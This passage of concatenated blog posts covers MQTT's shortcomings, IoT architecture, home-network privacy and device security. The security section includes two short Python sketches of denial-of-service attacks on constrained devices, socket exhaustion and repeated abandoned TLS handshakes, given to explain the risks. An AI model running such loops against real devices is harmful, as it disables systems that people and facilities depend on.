I have implemented it, however, because customers are asking for it. Some customers who are asking are already using it, and for those I see the implementation as a way to move them forward from where they are. Some customers are looking at fresh implementations of MQTT, and for those (you) I wrote this analysis so you can read the specification informed by an implementer's perspective. If MQTT remains your choice, I will try to make you as successful with it as I can, but there will be limits to the lengths I can go to due to the inherent deficiencies. There were times when technical pride would get in the way of folks at Microsoft supporting what customers demand; that's not my notion of running "services".

MQTT needs significant changes, and I think MQTT can opt for one of two potential rescue paths. The pity is that both ways will, and ought to, lead to its destruction, as either brings it too close to viable and modern alternatives.

Either MQTT brutally simplifies and gets rid of all the cruft while addressing its debts, most predominantly extensibility. On that route, it'll quickly become indistinguishable from JSON-over-WebSockets or particular incarnations of that model like Node's socket.io or ASP.NET's SignalR, and this includes wire footprint.

The alternative is that MQTT fixes all of its reliability deficiencies including ditching the "solicit push" model spanning connections, the awful error handling model, and its lack of multiplexing support, but then we're getting mighty close to AMQP 1.0. Which IBM doesn't seem to want to support in any serious fashion. For a reason. See up above.

MQTT is an old, recycled, and often weirdly inconsistent mess. It's not a good protocol, and certainly not a good protocol for the Internet of Things, where we will look to connect devices over long-haul links with unpredictable network conditions, and I believe it's unfixable without becoming something entirely different. We ought to know better, and OASIS also ought to know better.

[Update: Some reactions covered in this post]


[This is a follow-up post to "Internet of Things or Thing on the Internet?"]

The metaphor "Internet of Things" stands for the next wave of expansion of scope for distributed systems.

We started the journey with centralized systems, single computers, that you had to walk up to and control with switches and that were later able to be fed with batches of punch cards, allowing distributed creation of jobs with centralized processing. We then took the step of introducing the notion of terminals: remote control screens that allowed immediate interaction with the central computer by allowing interactive composition of jobs that were then fed into processing. The advent of PCs and PC-technology based servers and later smart phones then led to a decentralized landscape where personal functions are personal and shared functions tend to live at an appropriate scope for the respective audience, be it a work group sharing on a department server, a company sharing in a datacenter, or the general public sharing on a public web site.

Cloud-based systems are increasingly challenging this model as personal data gets held and processed in the cloud since people now increasingly own multiple digital devices, work groups are becoming less dependent on particular locations, and companies realize the advantages of lower operating cost when they delegate work to cloud providers.

What has remained stable across most of the waypoints in this journey since the introduction of terminals is that, in the majority of systems, there is some form of human interaction through a human-machine interface, motivating actions in a program at an appropriate scope, and the resulting output is presented to the same person or someone else through another such interface. Information flows. That information flow can be fairly immediate, as with myriads of database-frontend applications, or far decoupled, as when a cash register clerk's input (even by way of a scanner) ultimately rolls up into a cell of a financial balance sheet in Excel. Ultimately, the vast majority of software developers have so far built pure information technology systems. People put data in, and people get the same or a transformation of that data out. Put differently, information technology systems are intermediated from the physical world through people.

"Internet of Things" is a metaphor for an evolved kind of systems where that intermediation is removed.

Instead of a human observing the state of the physical world and submitting that observation into a system – which obviously can take the form of pointing a camera at an object, so we're not talking about keyboard input – we allow systems to make such observations for themselves and on a continuous basis. We're giving systems eyes to see, ears to hear, and noses to smell and sense pollution, and other senses to feel temperature, humidity, acidity, atmospheric pressure, vibration, acceleration, orientation, altitude, or geographic position.

These senses manifest in devices, aptly named sensors.

We're also giving systems the power to change the state of physical world objects as a result of these observations and additional inputs. Aircraft auto-pilot systems have long been implementing actuation of control surfaces based on sensor observations and many advanced military aircraft types would not be flyable at all without such digital avionics. Autonomous vessels and vehicles operate in the same fashion.

But even in scenarios that seem to be human-controlled at first blush, such as unlocking a vehicle just borrowed from a car sharing service with a smart phone app gesture, the decision whether the car will indeed unlock is made by the car sharing system based on an authorization verification and subsequent command routing decision to the right vehicle. A person pushes a button, but the actual unlock command is issued by the system based on a decision sequence.

Having (remote) systems be the judge in decision making, especially around authorization, will also be important in many scenarios where the mainline communication occurs peer-to-peer. You may interface with digital tools like a projector and a digital whiteboard in a conference room or a game console in your entertainment rack in a peer-to-peer fashion to optimize latency, but the matchmaking will commonly be aided by a system that helps ensure that only authorized and trustworthy people can participate in the peer-mesh, even if they all happen to sit in the same room.

The role that these devices, including the car's telematics box interfacing with the CAN bus, play towards the systems is that of "peripherals". That is obviously a very well-known concept for which we have very well understood models of how we attach input sensors like mice and keyboards or actuators like printers. What the "Internet of Things" changes is that these peripherals often become attached over long-haul links, and are not attached to singular computers but to distributed systems. But in principle, the telematics box in the car or a light pole on the street is not different from a printer from an architectural perspective.

What they also share with contemporary printers is the ability to communicate their current condition. A modern ink-jet or laser printer will always let you know when it is a good time to go to the store and buy fresh Original Brand™ ink or toner as the supply runs low, and it will do so via telemetry information sent to the computer hosting the driver.

What "Internet of Things" changes quite radically is the ecosystem breadth and diversity. There are many protocols and standards and systems and it's not like the operating systems made by two or three dominant players get to call the shots on how all devices are communicating, because there are very many modes of communication and broadly varying scenarios. Diversity will be the norm and there will be plenty of innovation on the communication front challenging the status quo.

The key innovation of the "Internet of Things" concept is that we're equipping distributed systems with senses that allow them (their programs) to acquire information in a self-motivated fashion, to make decisions, and to actuate things in the physical world as a result. Systems are the focus, not the things. The things are peripherals.


I just read the post Privacy in the Smart Home - Why we need an Intranet of Things by Kai Kreuzer from the openHAB.org project in which he is advocating an "Intranet of Things" enabled by a local integration hub, which is a model I refer to as "local gateway" in my "Service Assisted Communication" for Connected Devices post:

All connections to and from the device are made via or at least facilitated via a gateway, unless the device is peered with a single service, in which case that service takes on the role of the gateway. Eventual peer-to-peer connections are acceptable, but only if the gateway permits them and facilitates a secure handshake. The gateway that the device peers with may live on the local network and thus govern local connections. Towards external networks, the local gateway acts as a bridge towards the devices and is itself connected by the same set of principles discussed here, meaning it's acting like a device connected to an external gateway.

OpenHAB is an integration hub and automation software for home automation that runs on top of the JVM across a range of platforms and also scales down to the Raspberry Pi. A motivation for Kreuzer's post seems to be to announce the new companion service:

To cater for secure remote access, we have furthermore just started a private beta of a new service: my.openHAB will provide you the ability to connect to your openHAB over the Internet, securely, through commercial SSL certificates, without a need for making any holes in your home router and without a need for a static IP or dynamic DNS service. It does not store any data, but simply acts as a proxy that blindly forwards the communication.

The reason I'm picking up the post and commenting on it here is twofold: First, the way openHAB acts towards devices and how it federates with its "my.openHAB" service is a splendid illustration of the "Service Assisted Communication" principles I spelled out in my write-up. Mind that I explicitly mentioned there that they're broadly implemented already, and this is supporting evidence. Second, while I agree with the architectural foundation and I do find a pure "Intranet of Things" notion interesting, I don't think that's how things will play out in the long run, and I also believe there is, very unfortunately, a bit too much fear-mongering involved in trying to bring the point home. I also think there's a discussion to be had about explicit privacy tradeoffs.

The key concerns that are being raised are the following:

  • You are not the owner of your data; everything is sent to the cloud server, if you wish it or not. What happens with the data is not decided by yourself, but by the cloud service. You will only receive results of the data mining processes, be it as "smart" actions being triggered or as a colorful time series chart. I always thought of this as a no-go and wondered that other people did not mind this fact. […]
  • Even if you have full trust the cloud service company, the NSA affair should have shown you that your data is sniffed and stored in dubious places around the world. […]
  • Every device that creates a connection to a cloud service is a potential security risk. Most of these devices are embedded systems and many lack the possibility of receiving firmware updates for vulnerabilities. There are already many examples where such systems have been hacked - e.g. for heating systems or IP cameras. […]

Let's look at these.

First, whether or not you are the owner of your data when using a cloud service is a matter of the service's clear and explicit privacy policy as well as of legal regulation. I am personally an advocate of regulatory frameworks governing the use of telemetry, and I keep pointing out the importance of implementing clear privacy policies, including ways for customers to opt out of data collection and to have any previously collected data provably destroyed.

But I also believe that telemetry data collected by manufacturers of devices will yield better products and will help make these products more reliable as we use them.

The privacy problem is not one of "cloud". The problem is whether you trust the manufacturer and service provider and whether you understand the policies. If the privacy policy is 5 pages of 5pt legalese, return the product to the store or don't connect it to a network, ever. Because however good your intentions about keeping things private are, if a regular consumer buys a network-enabled appliance and connects it to a local network, that device will, in very many cases, promptly phone home to the manufacturer saying at least that it has been activated, and it will do so regardless of whether there's a home hub on the network. That is not a cloud problem. That is a device problem. What is the device gesture to opt into the "customer experience improvement program"?

I strongly believe that very many customers, indeed the vast majority, will gladly make a privacy tradeoff if they see obvious benefits, when the service provider is honest and transparent about what is being collected and what the customer's rights are, and if the customer can trust that an opt-out leads to an effective destruction of the raw data they've contributed and any data that could further be traced to their identity. There's obviously a gray zone on aggregate data. Opting out now clearly won't change the count of "How many dishwashers were activated in the city of Mönchengladbach in January 2014". Earning trust with concerned customers means drawing the line around that gray zone clearly. What if the manufacturer cheats? Sue them, along with 10,000 of your best friends.

The way we can make this scale is by supervision. I believe it would be possible to have a globally standardized and auditable privacy-practices seal along the lines of ISO 900x by 2018, and ways to anchor this privacy seal into the consumer hive-mind by that time. "If it doesn't carry this label, don't buy this product." The existence of that seal will also make competitors keep a very close eye on their respective practices and be loud if they see the other infringing.

Once there is clarity and auditable process on privacy practices, and data collection is opt-in, only then can we even get to the question of consumer choice. All of this is a prerequisite for even enabling consumers to make a choice between a local hub and a cloud service to connect their devices to. Without such a framework, manufacturers can largely do whatever they like once you give the devices network access.

What benefits would customers trade some of their data privacy for? Remote control of devices around the home, energy efficiency management for their heating and cooling systems, avoiding utility grid black-/brownouts with service credit for opting in, device feature updates, general usage statistics, seamless home/mobile/work user experiences, rental property management, and more. Most scenarios that go beyond simple remote control and local stats require data pooling in the cloud and producing insights that manufacturers, service providers, and utilities can provide higher-level services on top of. Some people will find it creepy when they get a notification that the grinder in their coffee-maker is about to fail due to wear and tear, asking whether they want to have it replaced – I, for one, would welcome that with open arms.

Kreuzer's second point about the NSA and other government agencies is one that I'm sympathetic with, but it's also a sad one to bring up, because he's announcing a service that falls into the same category as all cloud services, and he's assuming that an Intranet is generally safe from snooping. Let me preface this with the reminder that I'm speaking for myself and not at all for my employer here. Fact of the matter is that when the government of the country where the gateway service is hosted walks in with a court warrant, the good intentions come to a screeching halt or the service does. It is in the best commercial interest of all public cloud providers to keep customers' data private, as much as it is in the altruistic best interest of openHAB. The motivations may differ, but the goal is the same. We all want to lock the spies out and will do so until the Gewaltmonopol (the state's monopoly on physical force) shows up. The state's ability to force providers to act against their will and goals also extends to the telecom operators and has for decades. If you bring up "NSA" as an argument for keeping things on the Intranet, you will also have to allow the conspiracy theory that operator-supplied cable and DSL modem devices can be abused as bridgeheads into local area networks.

With this I am not defending, belittling, or justifying anything that we've learned about recently from the Snowden disclosures. I believe we've been betrayed by the governments, but fixing this is a political cleanup task and not a technical one. If the state shows up with a court order (even secretly if allowed by law) they're entitled to whatever that order says. If there's no such order, the government is clearly acting against the law – which computer systems can't read and interpret. What we can do is tighten security across the board, but it's an illusion to consider the "Intranet" a safe haven.

Which gets me to the third point about "every device that creates a connection to a cloud service is a potential security risk" which I consider to be tragically shortsighted. If we broaden the scope, though, it becomes instantly true: "every device that creates a connection is a potential security risk".

Home Intranets are the least defended and most negligently secured network spaces in existence. If you connect a BluRay player or Smart-TV or the legendary Refrigerator to your home network, that device has a very broad bouquet of options to see things and talk to things. And you will have no idea what it actually does unless you're skilled enough to use a tool like Wireshark for traffic analysis, which is only true for total network geeks.

In all actuality, it frightens me much less that the Refrigerator sends an hourly health-status packet to the manufacturer than that the Refrigerator has any access to anything on my network without me explicitly approving it. For the exact reasons that Kreuzer cites: Most of these devices are embedded systems and many lack the possibility of receiving firmware updates for vulnerabilities.

I want those devices off my private network rather than on it, for those exact reasons. Exactly contrary to the "Intranet" mantra, I would want devices that want to piggyback on my home network to be banned from talking to anything but the outside network, either by way of a special flag in the MAC address and forced routing rules and/or by forcing them into an IPSec tunnel with the network gateway device. And I will only unblock them when I want to. Otherwise I'm perfectly fine with those devices carrying their own GSM SIM or other long-range RF circuit and communicating with an external network once I have agreed to a policy that allows it and/or have explicitly enabled that functionality. I personally prefer for devices to rendezvous in public network space, where they are considered potentially hostile to each other.

I believe that the notion of by-default privileged mutual access for an arbitrary hodgepodge of devices, by the sole fact that they are plugged into the same network, is asking for trouble. Tricking devices into downloading and executing malicious payloads will be the favorite mass-exploitation vector for getting a local bridgehead into the home. Going through a local hub will help with that, but it requires that all devices use it, which I consider wishful thinking at best. My second-most favorite vector, and the one with the potential to inflict direct physical or monetary harm, is parking a van in front of the house and going straight through poorly protected local radio traffic based on flawed standards with weak protection, of which there are still many in home automation. That's not out of reach for a skilled stalker, a would-be burglar, or a private investigator doing a "background check". So now you've got someone on the "Intranet".

I believe in the model of having federations of local and external gateways help with protecting and governing access to devices and laid this out in my previous post in great detail. But I also believe that we can't trust any of the devices we bring home from the store and that a notion of "Intranet" is naively dangerous and will become worse as we connect more devices. The privacy issue is one we need to tackle by (self-) regulatory means and by establishing a model that allows consumers to make informed decisions whether a product is trustworthy and we need to establish measures to audit this and also sanction violations. Privacy is not nearly as easy as cloud and local. Privacy is about trust, trustworthiness, and betrayal.


There is good reason to be worried about the "Internet of Things" on current course and trajectory. Both the IT industry and manufacturers of "smart products" seem to look at connected special-purpose devices and sensors as a mere variation of information technology assets like servers, PCs, tablets, or phones. That stance is problematic, as it neglects important differences between the kinds of interactions that we're having with a phone or PC and the interactions we're having with special-purpose devices like a gas valve, a water heater, a glass-break sensor, a vehicle immobilizer, or a key fob.

Before I get to a proposal for how to address the differences, let's take a look at the state of things on the Web and elsewhere.

Information Devices

PCs, phones, and tablets are primarily interactive information devices. Phones and tablets are explicitly optimized around maximizing battery lifetime, and they preferably turn off partially when not immediately interacting with a person, or when not providing services like playing music or guiding their owner to a particular location. From a systems perspective, these information technology devices are largely acting as proxies towards people. They are "people actuators" suggesting actions and "people sensors" collecting input.

People can, for the most part, tell when something is grossly silly and/or could even put them into a dangerous situation. Even though there is precedent of someone driving off a cliff when told to do so by their navigation system, those cases are the rarest exceptions.

Their role as information-gathering devices, allowing people to browse the Web and use a broad variety of services, requires these devices to be "promiscuous" towards network services. The design of the Web, our key information tool, centers on aggregating, combining, and cross-referencing information from a myriad of different systems. As a result, the Web's foundation for secure communication is aligned with the goal of this architecture. At the transport protocol level, Web security largely focuses on providing confidentiality and integrity for fairly short-lived connections.

User authentication and authorization are layered on top, mostly at the application layer. The basic transport layer security model, including server authentication, builds on a notion of federated trust anchored in everyone (implicitly and largely involuntarily) trusting in a dozen handfuls of certification authorities (CA) chosen by their favorite operating system or browser vendor. If one of those CAs deems an organization trustworthy, it can issue a certificate that will then be used to facilitate secure connections, also meaning to express an assurance to the user that they are indeed talking to the site they expect to be talking to. To that end, the certificate can be inspected by the user. If they know and care where to look.

This federated trust system is not without issues. First, if the signing key of one of the certification authorities were to be compromised, potentially undetected, whoever is in possession of the key can now make technically authentic and yet forged certificates and use those to intercept and log communication that is meant to be protected. Second, the system is fairly corrupt as it takes all of $3 per year to buy a certification authority's trust with minimal documentation requirements. Third, the vast majority of users have no idea that this system even exists.

Yet, it all somehow works out halfway acceptably, because people do, for the most part, have common sense enough to know when something's not quite right, and it takes quite a bit of work to trick people into scams in huge numbers. You will trap a few victims, but not very many and not for very long. The system is flawed and some people get tricked, but that can also happen at the street corner. Ultimately, the worst that can happen – without any intent to belittle the consequences – is that people get separated from some of their money, or their identities get abused until the situation is corrected by intervention and, often, some insurance steps in to rectify these not entirely unexpected damages.

Special-Purpose Devices

Special-purpose devices, from simple temperature sensors to complex factory production lines with thousands of components inside them are different. The devices are much more scoped in purpose and even if they may provide some level of a people interface, they're largely scoped to interfacing with assets in the physical world. They measure and report environmental circumstances, turn valves, control servos, sound alarms, switch lights, and do many other tasks. They help doing work for which an information device is either too generic, too expensive, too big, or too brittle.

If something goes wrong with automated or remote controllable devices that can influence the physical world, buildings may burn down and people may die. That's a different class of damage than someone maxing out a stolen credit-card's limit. The security bar for commands that make things move, and also for sensor data that eventually results in commands that cause things to move, ought to be, arguably, higher than in an e-commerce or banking scenario.

What doesn't help on the security front is that machines, unlike most people, don't have a ton of common sense. A device that goes about its day in its programmed and scheduled ways has no notion of figuring out when something is not quite right. If you can trick a device into talking to a malicious server or intermediary, or into following a network protocol redirection to one, it'll dutifully continue doing its work unless it's explicitly told never to do so.

Herein lies one of the challenges. A lot of today's network programming stacks and Web protocols are geared towards the information-oriented Web and excellently enable building promiscuous clients by default. In fact, the whole notion of REST rests on the assumption that the discovery and traversal of resources is performed through hypertext links included in the returned data. As the Web stacks are geared towards that model, there is extra work required to make a Web client faithful to a particular service and to validate, for instance, the thumbprint of the TLS certificate returned by the permitted servers. As long as you get to interact with the web stack directly, that's usually okay, but the more magic libraries you use on top of the Web stack basics, the harder that might get. And you have, of course, and not to be underestimated in complexity, to teach the device the right thumbprint(s) and thus effectively manage and distribute an allow-list.
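For illustration, here is what that certificate pinning can look like with nothing but Python's standard library; the fingerprint value is a placeholder that would be provisioned out of band:

    import hashlib, socket, ssl

    # Pin to an expected certificate fingerprint instead of trusting the CA
    # system; the fingerprint below is an illustrative placeholder.
    PINNED_SHA256 = "0f3c...replace-with-real-fingerprint"

    def connect_pinned(host, port=443):
        ctx = ssl.create_default_context()
        ctx.check_hostname = False       # trust the pin, not the CA hierarchy
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(socket.create_connection((host, port)),
                               server_hostname=host)
        der = sock.getpeercert(binary_form=True)   # raw DER certificate
        if der is None or hashlib.sha256(der).hexdigest() != PINNED_SHA256:
            sock.close()
            raise ssl.SSLError("server certificate does not match the pinned value")
        return sock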

Generally, device operators will not want to allow unobserved and non-interactive devices that emit telemetry and receive remote commands to be able to stray from a very well-defined set of services they're peered with. They should not be promiscuous. Quite the opposite.

Now – if the design goal is to peer a device with a particular service, the federated certificate circus turns into more of a burden than a desired protocol-suite feature. As the basic assumptions about promiscuity towards services are turned on their head, the 3-6 KByte and 2 network roundtrips of certificate exchange chatter slow things down and may also cost quite a bit of real money, paying for precious, metered wireless data volume. Even though everyone currently seems to assume that Transport Layer Security (TLS) is the only secure channel protocol we'll ever need, it's far from ideal for the 'faithful' connected devices scenario.

If you allow me to take you into the protocol basement for a second: That may be somewhat different if we could seed clients with TLS RFC5077 session resumption tickets in an out-of-band fashion, and have a TLS mode that never falls back to certs. Alas, we do not.

Bi-Directional Addressing

Connected and non-interactive devices not only differ in terms of the depth of their relationship with backend services, they also differ very much in terms of their interaction patterns with these services when compared to information-centric devices. I generally classify the interaction patterns for special-purpose devices into the categories Telemetry, Inquiries, Commands, and Notifications (summarized in a short sketch after the list):

  • Telemetry is unidirectionally flowing information which the device volunteers to a collecting service, either on a schedule or based on particular circumstances. That information represents the current or temporally aggregated state of the device or the state of its environment, like readings from sensors that are associated with it.
  • With Inquiries, the device solicits information about the state of the world beyond its own reach and based on its current needs; an inquiry can be a singular request, but might also ask a service to supply ongoing updates about a particular information scope. A vehicle might supply a set of geo-coordinates for a route and ask for continuous traffic alert updates about that particular route until it arrives at the destination.
  • Commands are service-initiated instructions sent to the device. Commands can tell a device to provide information about its state, or to change the state of the device, including activities with effects on the physical world. That includes, for instance, sending a command from a smartphone app to unlock the doors of your vehicle, whereby the command first flows to an intermediating service and from there it's routed to the vehicle's onboard control system.
  • Notifications are one-way, service-initiated messages that inform a device or a group of devices about some environmental state they'll otherwise not be aware of. Wind parks will be fed weather forecast information, cities may broadcast information about air pollution, suggesting that fossil-fueled systems throttle CO2 output, or a vehicle may want to show weather or news alerts or text messages to the driver.
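As a compact summary of that taxonomy, here's the classification as a small type sketch (purely illustrative):

    from dataclasses import dataclass

    # The four interaction patterns as a type sketch; "initiator" captures
    # the asymmetry discussed below.
    @dataclass
    class Interaction:
        name: str
        initiator: str        # "device" or "service"
        expects_reply: bool

    PATTERNS = [
        Interaction("telemetry",    "device",  False),
        Interaction("inquiry",      "device",  True),
        Interaction("command",      "service", True),
        Interaction("notification", "service", False),
    ]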

While Telemetry and Inquiries are device-initiated, their mirrored pattern counterparts, Commands and Notifications, are service-initiated – which means that there must be a network path for messages to flow from the service to the device, and that requirement bubbles up a set of important technical questions:

  • How can I address a device on a network in order to route commands and notifications to it?
  • How can I address a roaming and/or mobile device on a network in order to route commands and notifications to it?
  • How can I address a power constrained device on a network in order to route commands and notifications to it?
  • How can I send commands or notifications with latency that's acceptable for my scenario?
  • How can I ensure that the device only accepts legitimate commands and trustworthy notifications?
  • How can I ensure that the device is not easily susceptible to denial-of-service attacks that render it inoperable towards the greater system? (not good for building security sensors, for instance)
  • How can I do this with several hundred thousand or millions of devices attached to a telemetry and control system?

Most current approaches that I'm running into are trying to answer the basic addressing question with traditional network techniques. That means that the device either gets a public network address or it is made part of a virtual network and then listens for incoming traffic using that address, acting like a server. For using public addresses the available options are to give the device a proper public IPv4 or IPv6 address or to map it uniquely to a well-known port on a network address translation (NAT) gateway that has a public address. As the available pool of IPv4 addresses has been exhausted and network operators are increasingly under pressure to move towards providing subscribers with IPv6 addresses, there's hope that every device could eventually have its very own routable IPv6 address. The virtual network approach is somewhat similar, but relies on the device first connecting to some virtual network gateway via the underlying native network, and then getting an address assigned within the scope of the virtual network, which it shares with the control system that will use the virtual network address to get to the device.

Both of those approaches are reasonable from the perspective of answering the first, basic addressing question raised above, if you pretend for a moment that opening inbound ports through a residential edge firewall were acceptable. However, things get tricky enough once we start considering the other questions, like devices not being in the house, but on the road.

Roaming is tricky for addressing, and even trickier if the device is switching networks or fully mobile, hopping through networks and occasionally dropping connections as it gets out of radio range. There are "Mobile IP" roaming standards for both IPv4 (RFC3344) and IPv6 (RFC6275), but those standards rely on a notion of traffic relaying through agents, and those are problematic at scale with very large device populations, as the relay will have to manage and relay traffic for very many routes and also needs to keep track of the devices hopping foreign networks. Relaying obviously also has significant latency implications with global roaming. What even the best implementations of these standards-based approaches for roaming can't solve is that you can't connect to a device that's outside of radio coverage and therefore not connected, at all.

The very same applies to the challenge of how to reliably deliver commands and notifications to power-constrained devices. Those devices may need to survive on battery power for extended periods (in some cases for years) between battery recharges, or their external power source, like "power stealing" circuits employed in home building automation devices, may not yield sufficient power for sustained radio connectivity to a base station. Even a vehicle battery isn't going to like powering an always-on radio when parked in the long-term airport garage while you're on vacation for 2 weeks.

So if a device design aims to conserve power by only running the radio occasionally, or if the device is mobile and frequently in and out of radio coverage or hopping networks, it gets increasingly difficult to reach it naively by opening a network connection to it and then hoping for that connection to remain stable if you're lucky enough to catch a moment when the device is indeed ready to talk. That all assumes the device even has a stable network address provided by one of the cited "Mobile IP" standards, or that it registers with an address registration/lookup service every time it comes online with a new address so that the control service can locate it.

All these approaches aiming to provide end-to-end network routes between devices and their control services are almost necessarily brittle. As it tries to execute a command, the service needs to locate the device, establish a connection to it, issue the command, and collect the command feedback, all while, say, a vehicle drives through a series of tunnels. Not only does this model rely on the device being online and available at the required moment, it also introduces a high number of tricky-to-diagnose failure points (such as the device flipping networks right after the service resolved its address) with associated security implications (who gets that newly orphaned address next?). And it has inherent reliability issues at the application layer, since any fault that occurs after the control system has sent the command introduces doubt in the control system about whether the command was successfully executed; and not all commands are safe to just blindly retry, especially when they have physical consequences.

For stationary power-constrained or wirelessly connected devices, the common approach to bridging the last meters/yards is a hub device that's wired to the main network and can bridge to the devices that live on a local network. The WLAN hub(s) in many homes and buildings are examples of this, as there is obviously a need to bridge between devices roaming around the house and the ISP network. From an addressing perspective, these hubs don't change the general challenge much, as they themselves need to be addressable for commands they then ought to forward to the targeted device, and that means you're still opening up a hole in the residential firewall, either by explicit configuration or via (don't do this) UPnP.

If all this isn't yet challenging enough for your taste, there's still security. Sadly, we can't have nice and simple things without someone trying to exploit them for malice or stupid "fun".

Trustworthy Communication

All information that's being received from and sent to a device must be trustworthy if anything depends on that information – and why would you send it otherwise? "Trustworthy communication" means that information is of verifiable origin, correct, unaltered, timely, and cannot be abused by unauthorized parties in any fashion. Even telemetry from a simple sensor that reports a room's temperature every five minutes can't be left unsecured. If you have a control system reacting to that input, or do anything else with that data, the device and the communication paths from and to it must be trustworthy.

"Why would anyone hack temperature sensors?" – sometimes "because they can", sometimes because they want to inflict monetary harm on the operator or physical harm on the facility and what's in it. Neglecting to protect even one communication path in a system opens it up for manipulation and consequential harm.

If you want to believe in the often-cited projection of 50 billion connected devices by 2020, the vast majority of those will not be classic information devices, and they will not be $500 or even $200 gadgets. Very many of these connected devices will rather be common consumer or industry goods that have been enriched with digital service capabilities. Or they might even just be super inexpensive sensors hung off the side of buildings to collect environmental information. Unlike apps on information devices, most of these services will have auxiliary functions. Some of these capabilities may even be largely invisible. If you have a device with built-in telemetry delivery that allows the manufacturer or service provider to sense an oncoming failure and proactively get in touch with you for service – which is something manufacturers plan to do – and then the device just never breaks, you may never even know such a capability exists, especially if the device doesn't rely on connectivity through your own network. In most cases, these digital services will have to be priced into the purchase price of the product or even be monetized through companion apps and services, as it seems unlikely that consumers will pay for 20 different monthly subscriptions for connected appliances. It's also reasonable to expect that many devices sold will have the ability to connect, but their users will never intentionally take advantage of these features.

On the cost side, a necessary result of all this is that the logic built into many products will (continue to) use microcontrollers that require little power, have a small footprint, and are significantly less expensive than the high-powered processors and ample memory in today's information devices – trading compute power for much reduced cost. But trading compute power and memory for cost savings also means trading away cryptographic capability and, more generally, resilience against potential attacks.

The horror-story meme "if you're deep in the forest nobody will hear your screams" is perfectly applicable to unobserved field-deployed devices under attack. If a device were to listen for unsolicited traffic, meaning it listens for incoming TCP connections or UDP datagrams or some form of UDP-datagram-based sessions, thus acting as a server, it would have to accept and then triage those connection attempts into legitimate and illegitimate ones.

With TCP, even enticing the device to accept a connection is already a very fine attack vector, because a TCP connection burns memory in the form of a receive buffer. So if the device were to use a network protocol circuit like, for instance, the WizNet W5100 used on the popular enthusiast tinker platform Arduino Ethernet, the device's communication capability is saturated at just 4 connections, which an attacker could then service in a slow byte-per-packet fashion and thus effectively take the device out. As that happens, the device now also wouldn't have a path to scream for help through, unless it made an a priori reservation of resources (assuming the circuit supports it) for an outbound connection to whoever plays the cavalry.
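To make the slow-drip exhaustion concrete, here is a minimal sketch of the attacker's side in Python; the device address is an invented placeholder and the four-socket ceiling mirrors a W5100-class chip, so take this as an illustration of the vector, not a recipe:

```python
import socket
import time

DEVICE = ("192.0.2.10", 80)  # invented placeholder address
SOCKET_LIMIT = 4             # a W5100-class chip offers only 4 sockets

# Claim every socket the device has and never let go.
connections = [socket.create_connection(DEVICE) for _ in range(SOCKET_LIMIT)]

while True:
    # Dribble a single byte into each held connection just often
    # enough to defeat idle timeouts; the device's receive buffers
    # stay allocated and legitimate clients are locked out.
    for conn in connections:
        conn.sendall(b"X")
    time.sleep(30)
```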

If we were to leave the TCP-based resource exhaustion vector out of the picture, the next hurdle is to establish a secure baseline over the connection and then triage connections into good and bad. As the protocol world stands, TLS (RFC5246) and DTLS (RFC6347) are the kings of the security protocol hill, and I've discussed the issues with their inherent client promiscuity assumption above. If we were indeed connecting from a control service to a device in an outbound fashion, and the device were to act as server, the model may be somewhat suitable, as the control service will indeed have to speak to very many, potentially millions of, devices. But contrary to the Web model where the browser has no idea where the user will send it, the control system has a very firm notion of the devices it wants to speak to. There are many of those, but there is no promiscuity going on. If they play server, each device needs to have its own PKI certificate (there is a specified option to use TLS without certificates, but that does not matter much in practice) with its own private key, since they're acting as servers and since you can't leak shared private keys into untrusted physical space, which is where most of the devices will end up living.

The strategy of using the standard TLS model and having the device play server has a number of consequences. First, whoever provisions the devices will have to be a root or intermediate PKI certification authority. That's easy to do, unless there were any need to tie into the grand PKI trust federation of today's Web, which is largely anchored in the root certificate store contents of today's dominant client platforms. If you had the notion that "Internet of Things" were to mean that every device could be a web server to everyone, you would have to buy yourself into the elite circle of intermediate CA authorities by purchasing the necessary signing certificates or services from a trusted CA, and that may end up being fairly expensive as the oligopoly is protective of its revenues. Second, those certificates need to be renewed and the renewed ones need to be distributed securely. And when devices get stolen or compromised, or the customer opts out of the service, these certificates also need to get revoked, and that revocation service needs to be managed and run and will have to be consulted quite a bit.

Also, the standard configuration of most application protocol stacks' usage of TLS ties into DNS for certificate validation, and it's not obvious that DNS is the best choice for associating name and network address for devices that rapidly hop networks when roaming – unless of course you had a stable "home network" address as per IPv6 Mobile IP. But that would mean you are now running an IPv6 Mobile relay. The alternative is to validate the certificate by some other means, but then you'll be using a different validation criterion in the certificate subject and will no longer be aligned with the grand PKI trust federation model. Thus, you're back to effectively managing an isolated PKI infrastructure, with all the bells and whistles like a revocation service, and you will do so while looking for the exact opposite of the promiscuous security session model that all of this enables.

Let's still assume none of that would matter and (D)TLS with PKI dragged in its wake were okay, and the device could use those and indeed act as a server accepting inbound connections. Then we're still faced with the fact that cryptographic computation is not cheap. Moving crypto into hardware is very possible, but impacts the device cost. Doing crypto in software requires that the device deals with it inside of the application or underlying frameworks. And for a microcontroller that costs a few dollars, that's non-negligible work. So the next vector to keep the device from doing its actual work is to keep it busy with crypto. Present it with untrusted or falsely signed client certificates (if it were to expect those). Create a TLS link (even IPSec) and abandon it right after the handshake. Nice ways to burn some watts.
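The crypto-burn vector is just as unspectacular in code. A hedged sketch, again against an invented placeholder address: the attacker forces the device through the expensive part of the TLS handshake and then simply walks away.

```python
import socket
import ssl

DEVICE = ("192.0.2.10", 443)  # invented placeholder address

# The attacker doesn't care about trust, only about making the
# device spend cycles, so certificate validation is switched off.
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE

while True:
    try:
        with socket.create_connection(DEVICE, timeout=5) as raw:
            # Wrapping the socket drives the device through the full
            # handshake, including the costly asymmetric operations...
            with context.wrap_socket(raw) as tls:
                pass  # ...and then the session is simply abandoned.
    except OSError:
        pass  # failures cost the attacker nothing
```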

Let's still pretend none of this were a problem. We're now up at the application level with transport layer security underneath. Who is authorized to talk to the device and which of the connections that pop up through that transport layer are legitimate? And if there is an illegitimate connection attempt, where do you log these and if that happens a thousand times a minute, where do you hold the log and how do you even scream for help if you're pegged on compute by crypto? Are you keeping an account store in the device? Quite certainly not in a system whose scope is more than one device. Are you then relying on an external authentication and authorization authority issuing authorization tokens? That's more likely, but then you're already running a token server.
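What relying on an external token authority boils down to can be shown in a few lines. The sketch below is purely illustrative, with an invented token format and key name; the point is that the verifying party needs a provisioned key and a clock, not an account store:

```python
import hashlib
import hmac
import time

# Shared between the token server and the verifier at provisioning
# time; invented name, never sent over the wire.
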